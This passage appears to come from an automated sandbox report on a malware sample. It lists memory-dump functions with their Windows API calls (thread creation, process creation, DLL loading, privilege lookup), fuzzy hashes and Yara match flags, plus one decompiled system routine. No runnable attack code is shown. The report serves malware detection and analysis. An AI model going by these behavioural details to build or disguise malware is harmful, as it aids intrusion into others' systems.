                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: cc342aee83ec27c0475f110a2218e8e4c79e56d9d50472d5e79e0091290bf28a
                                                                                                                    • Instruction ID: 008780202e30e5bc0d21e7a57481d12045aa8a014a82f8893430fed6a7bf81f3
                                                                                                                    • Opcode Fuzzy Hash: cc342aee83ec27c0475f110a2218e8e4c79e56d9d50472d5e79e0091290bf28a
                                                                                                                    • Instruction Fuzzy Hash: 179002B120100402F24071594404746004597D0345F51C525A60596A4E86A9DDD976A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 38afef37d746a1243a2e59517d1688e9d1f83766cb89a30421d543b26107f5f1
                                                                                                                    • Instruction ID: c2340ab7d285caab10a69f8ca5a0033f20559182ae030ca68438bfb5b1cdc4e0
                                                                                                                    • Opcode Fuzzy Hash: 38afef37d746a1243a2e59517d1688e9d1f83766cb89a30421d543b26107f5f1
                                                                                                                    • Instruction Fuzzy Hash: 1490026121180042F30075694C14B07004597D0347F51C629A11496A4CC965D8656561
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00576EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00576F98
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: c1df3371a0550e8e4cb51ebb43e835f5c21b6a45b6350613e5b7404356e44d32
                                                                                                                    • Instruction ID: b4bd8d843a7b6f0330f427bf3241200d02be3d193ea4cbce8504897e3c25b34d
                                                                                                                    • Opcode Fuzzy Hash: c1df3371a0550e8e4cb51ebb43e835f5c21b6a45b6350613e5b7404356e44d32
                                                                                                                    • Instruction Fuzzy Hash: 9E3190B5601705ABD711DF64E8A5FA7BBF8BB88700F00841DF61EAB241D730B945DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00576EE7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00576F98
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: 4d0ff73ec69adb188ac55c5cd274356bd8c67ec5d8b2c17f735e3326067578fb
                                                                                                                    • Instruction ID: 2e773bf296a7b437e640cb60a0f196eee084966ba610478123e244f1db3c6bdf
                                                                                                                    • Opcode Fuzzy Hash: 4d0ff73ec69adb188ac55c5cd274356bd8c67ec5d8b2c17f735e3326067578fb
                                                                                                                    • Instruction Fuzzy Hash: 0821BDB1605705ABDB11DF64E8A5FA7BBB8BB88700F10806DF61DAB241D370A845DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00577013, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0056CCE0,?,?), ref: 0057705C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID: {,`_
                                                                                                                    • API String ID: 2422867632-839147719
                                                                                                                    • Opcode ID: 9dfb60658e71a7dafc987092f7051f52a1fd21ef20e2736b5179ff9b5a5a1669
                                                                                                                    • Instruction ID: 6c1dcbe8afd0ab950181c986467733c990b6868ea7fd230f11e3430888366188
                                                                                                                    • Opcode Fuzzy Hash: 9dfb60658e71a7dafc987092f7051f52a1fd21ef20e2736b5179ff9b5a5a1669
                                                                                                                    • Instruction Fuzzy Hash: 22F06D7638030036E230665DAC03FA776A89FD4F30F644215F65EAB2C1CA99F94286A8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005784D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057850D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                    • Opcode ID: 29d648da0dfa36d9a9a8b517bcd256247363778c7d3b21846dbe6b0703062777
                                                                                                                    • Instruction ID: b48c5727e6d9ba4dae8abc496bddb1c6d1a9a4e06b775e2f936ac18faf09765c
                                                                                                                    • Opcode Fuzzy Hash: 29d648da0dfa36d9a9a8b517bcd256247363778c7d3b21846dbe6b0703062777
                                                                                                                    • Instruction Fuzzy Hash: 56E068B8214246DFD714EF28E8808BB7790FFD1344B14898EE88847307C231C429CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005784E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057850D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                    • Instruction ID: 97ed623ecc398109955b0a2b6b388df5e6599d41d8f5dc1c0f6580038ae47a4e
                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                    • Instruction Fuzzy Hash: E3E04FB12002186BD714DF59DC49EA777ACEF88750F018555FD0C57241C630F910CAF0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005784A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(&5W,?,00573C9F,00573C9F,?,00573526,?,?,?,?,?,00000000,00000000,?), ref: 005784CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID: &5W
                                                                                                                    • API String ID: 1279760036-2495604129
                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                    • Instruction ID: 6536d50349683df4172293a110fb644b4b8dc1960cc81d325c67f0943aeeadd3
                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                    • Instruction Fuzzy Hash: 4AE012B1200218ABDB24EF99DC45EA777ACAF88750F118559BA085B282CA30F9108AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00567270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005672CA
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                    • Instruction ID: ae3429596dc7785c729c6132c3cc185fc86a126d7362907d0af2a8675cefc571
                                                                                                                    • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                    • Instruction Fuzzy Hash: 9501D631A8022977E720A6949C07FFE7B6C6F84F51F154118FF08BB1C1E6A46A0687F6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005672F4, Relevance: 1.7, APIs: 1, Instructions: 157threadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                                                                                                      • Part of subcall function 00567270: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005672CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 3b42a73d309e75c11951522f5aa32ac8369a41d599062f4291c52ebe1f7873b3
                                                                                                                    • Instruction ID: 4cc127f7be1784f9203eaa82d5866ad5f43afc1232cf070a7bc1a9cdc246f6a2
                                                                                                                    • Opcode Fuzzy Hash: 3b42a73d309e75c11951522f5aa32ac8369a41d599062f4291c52ebe1f7873b3
                                                                                                                    • Instruction Fuzzy Hash: A65172B1A0420A9FDB15DF24D889BABBBF8FB49304F10496DF84D97341DB30A941DBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00569B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00569BA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2234796835-0
                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                    • Instruction ID: b8d06a93a752d458b9a6538730d0d6476dc71d8a0f41e74cb941d2aff0290cfe
                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                    • Instruction Fuzzy Hash: E90152B5D0010EA7DB10DAA0EC46F9DB778AB94308F008195E90C97141F671EB04D791
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00578550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005785A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2186235152-0
                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                    • Instruction ID: c3ae778e53b2d24c0373b4aa13d9e48e927da1c86e5cce37fc5ed784232c8d67
                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                    • Instruction Fuzzy Hash: 4501AFB2210108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00577020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0056CCE0,?,?), ref: 0057705C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                                                    • Instruction ID: ec567dba4a396b3c4c81d6264b9867dc2b685c4e9a1484c43b2a44a97484e527
                                                                                                                    • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                                                    • Instruction Fuzzy Hash: 50E06D333902043AE3306599AC02FA7B7AC9BC5B20F544026FA0DEA2C1D595F80152A9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00578640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578670
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                    • Instruction ID: dc1c0cafb266013979f7e775de521ab32b128a0581b19f274a09776c1b85bd20
                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                    • Instruction Fuzzy Hash: B8E01AB12002186BDB20DF49DC85EE737ADAF88750F018155BA0C57241C930E8108BF5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0056D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                    • Instruction ID: 97667a02613aff0e6310564f6432e6eae6da04a84dedf890a778ae136743e689
                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                    • Instruction Fuzzy Hash: AAD05E617503042AEB10BAA49C07F26768CAB84B10F494064F948972C3E964E9004162
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: d46803482c88a3ebd1ffa5b621a70351ce37a08a8324fa0302d21257b0b565f9
                                                                                                                    • Instruction ID: 1b36e35f4bb1a22d09ebf41461b5660fd629f04c6714d2fc3d9530143f428cf2
                                                                                                                    • Opcode Fuzzy Hash: d46803482c88a3ebd1ffa5b621a70351ce37a08a8324fa0302d21257b0b565f9
                                                                                                                    • Instruction Fuzzy Hash: 1FB09BB19014C5C9F711E7604608717794077D1745F27C566D3424791B4778D095F5F5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0490FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 53%
                                                                                                                    			E0490FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E048BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04905720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04905720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                    0x0490fdda
                                                                                                                    0x0490fde2
                                                                                                                    0x0490fde5
                                                                                                                    0x0490fdec
                                                                                                                    0x0490fdfa
                                                                                                                    0x0490fdff
                                                                                                                    0x0490fe0a
                                                                                                                    0x0490fe0f
                                                                                                                    0x0490fe17
                                                                                                                    0x0490fe1e
                                                                                                                    0x0490fe19
                                                                                                                    0x0490fe19
                                                                                                                    0x0490fe19
                                                                                                                    0x0490fe20
                                                                                                                    0x0490fe21
                                                                                                                    0x0490fe22
                                                                                                                    0x0490fe25
                                                                                                                    0x0490fe40

                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0490FDFA
                                                                                                                    Strings
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0490FE2B
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0490FE01
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                    • Opcode ID: 20a0b823829cb717356a7588daa36e81e6ae92e81c655208267f9d8b8922b303
                                                                                                                    • Instruction ID: 85ed7d3b02af1f8053ba4283ade1fe4075435d133fe6709211cb1ac136f7109e
                                                                                                                    • Opcode Fuzzy Hash: 20a0b823829cb717356a7588daa36e81e6ae92e81c655208267f9d8b8922b303
                                                                                                                    • Instruction Fuzzy Hash: 42F0FC32600101BFE6201A45DC06F237B5EEB84730F154754F614555D1D9A2F920D6F4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%